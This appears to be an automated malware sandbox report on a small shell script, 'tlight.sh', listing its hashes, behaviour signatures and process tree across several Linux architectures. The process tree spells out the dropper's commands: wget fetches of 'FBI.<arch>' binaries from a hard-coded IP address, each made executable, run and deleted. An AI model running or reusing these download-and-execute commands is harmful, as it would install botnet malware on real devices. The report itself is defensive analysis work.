Resubmissions
22-08-2022 17:16
220822-vs7zgsaggj 922-08-2022 17:12
220822-vqym2adfh5 922-08-2022 05:59
220822-gpy1hsbgdp 922-08-2022 02:57
220822-df17qscff9 922-08-2022 02:42
220822-c68ttscee5 9Analysis
-
max time kernel
22153s -
max time network
157s -
platform
linux_armhf -
resource
debian9-armhf-en-20211208 -
resource tags
arch:armhfimage:debian9-armhf-en-20211208kernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
22-08-2022 02:42
Static task
static1
Behavioral task
behavioral1
Sample
tlight.sh
Resource
ubuntu1804-amd64-en-20211208
Behavioral task
behavioral2
Sample
tlight.sh
Resource
debian9-armhf-en-20211208
Behavioral task
behavioral3
Sample
tlight.sh
Resource
debian9-mipsbe-en-20211208
Behavioral task
behavioral4
Sample
tlight.sh
Resource
debian9-mipsel-en-20211208
General
-
Target
tlight.sh
-
Size
1KB
-
MD5
894e976a4a3f5e6038168b5c4b78f98d
-
SHA1
13cd9bc7146037714e546063867353cbb1b6ff03
-
SHA256
54f9d96c9369f699bff8c8ceae4d6f1376616488696be2d361f8c83034eab238
-
SHA512
4b3ddf27afd2f04d19d879aedf5e083af6d2511d426b6a9ce991ffcebaa4013890b6ab473c68c36c25717ced8c7ef4e89765fdd8407adc3b00be44256a0f7571
Malware Config
Signatures
-
Writes file to system bin folder 1 TTPs 1 IoCs
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.
Processes:
cpdescription ioc process /proc/filesystems /proc/filesystems cp -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes:
cptlight.shdescription ioc process /tmp/busybox /tmp/busybox cp /tmp/tlight.sh /tmp/tlight.sh tlight.sh
Processes
-
/tmp/tlight.sh/tmp/tlight.sh wget "http://37.44.238.187/tlight.sh;chmod" 777 tlight.sh1⤵
- Writes file to tmp directory
PID:363 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to system bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:364 -
/usr/bin/wgetwget http://37.44.238.187/FBI.i4862⤵PID:366
-
/bin/chmodchmod 777 FBI.i4862⤵PID:370
-
./FBI.i486./FBI.i486 tlight.i486.wget2⤵PID:371
-
/bin/rmrm -rf FBI.i4862⤵PID:372
-
/usr/bin/wgetwget http://37.44.238.187/FBI.x86_642⤵PID:374
-
/bin/chmodchmod 777 FBI.x86_642⤵PID:377
-
./FBI.x86_64./FBI.x86_64 tlight.x86_64.wget2⤵PID:378
-
/bin/rmrm -rf FBI.x86_642⤵PID:380
-
/usr/bin/wgetwget http://37.44.238.187/FBI.i5862⤵PID:381
-
/bin/chmodchmod 777 FBI.i5862⤵PID:383
-
./FBI.i586./FBI.i586 tlight.i586.wget2⤵PID:384
-
/bin/rmrm -rf FBI.i5862⤵PID:385
-
/usr/bin/wgetwget http://37.44.238.187/FBI.i6862⤵PID:386
-
/bin/chmodchmod 777 FBI.i6862⤵PID:388
-
./FBI.i686./FBI.i686 tlight.i686.wget2⤵PID:389
-
/bin/rmrm -rf FBI.i6862⤵PID:391
-
/usr/bin/wgetwget http://37.44.238.187/FBI.mips2⤵PID:392
-
/bin/chmodchmod 777 FBI.mips2⤵PID:394
-
./FBI.mips./FBI.mips tlight.mips.wget2⤵PID:395
-
/bin/rmrm -rf FBI.mips2⤵PID:397
-
/usr/bin/wgetwget http://37.44.238.187/FBI.mipsel2⤵PID:398
-
/bin/chmodchmod 777 FBI.mipsel2⤵PID:400
-
./FBI.mipsel./FBI.mipsel tlight.mipsel.wget2⤵PID:401
-
/bin/rmrm -rf FBI.mipsel2⤵PID:402
-
/usr/bin/wgetwget http://37.44.238.187/FBI.arm2⤵PID:403
-
/bin/chmodchmod 777 FBI.arm2⤵PID:405
-
./FBI.arm./FBI.arm tlight.arm.wget2⤵PID:406
-
/bin/rmrm -rf FBI.arm2⤵PID:470
-
/usr/bin/wgetwget http://37.44.238.187/FBI.arm52⤵PID:471
-
/bin/chmodchmod 777 FBI.arm52⤵PID:473
-
./FBI.arm5./FBI.arm5 tlight.arm5.wget2⤵PID:474
-
/bin/rmrm -rf FBI.arm52⤵PID:532
-
/usr/bin/wgetwget http://37.44.238.187/FBI.arm62⤵PID:539
-
/bin/chmodchmod 777 FBI.arm62⤵PID:541
-
./FBI.arm6./FBI.arm6 tlight.arm6.wget2⤵PID:542
-
/bin/rmrm -rf FBI.arm62⤵PID:548
-
/usr/bin/wgetwget http://37.44.238.187/FBI.arm72⤵PID:549
-
/bin/chmodchmod 777 FBI.arm72⤵PID:551
-
./FBI.arm7./FBI.arm7 tlight.arm7.wget2⤵PID:552
-
/bin/rmrm -rf FBI.arm72⤵PID:558
-
/usr/bin/wgetwget http://37.44.238.187/FBI.ppc2⤵PID:559
-
/bin/chmodchmod 777 FBI.ppc2⤵PID:563
-
./FBI.ppc./FBI.ppc tlight.ppc.wget2⤵PID:564
-
/bin/rmrm -rf FBI.ppc2⤵PID:569
-
/usr/bin/wgetwget http://37.44.238.187/FBI.m68k2⤵PID:570
-
/bin/chmodchmod 777 FBI.m68k2⤵PID:574
-
./FBI.m68k./FBI.m68k tlight.m68k.wget2⤵PID:575
-
/bin/rmrm -rf FBI.m68k2⤵PID:576
-
/usr/bin/wgetwget http://37.44.238.187/FBI.sh42⤵PID:577
-
/bin/chmodchmod 777 FBI.sh42⤵PID:579
-
./FBI.sh4./FBI.sh4 tlight.sh4.wget2⤵PID:580
-
/bin/rmrm -rf FBI.sh42⤵PID:582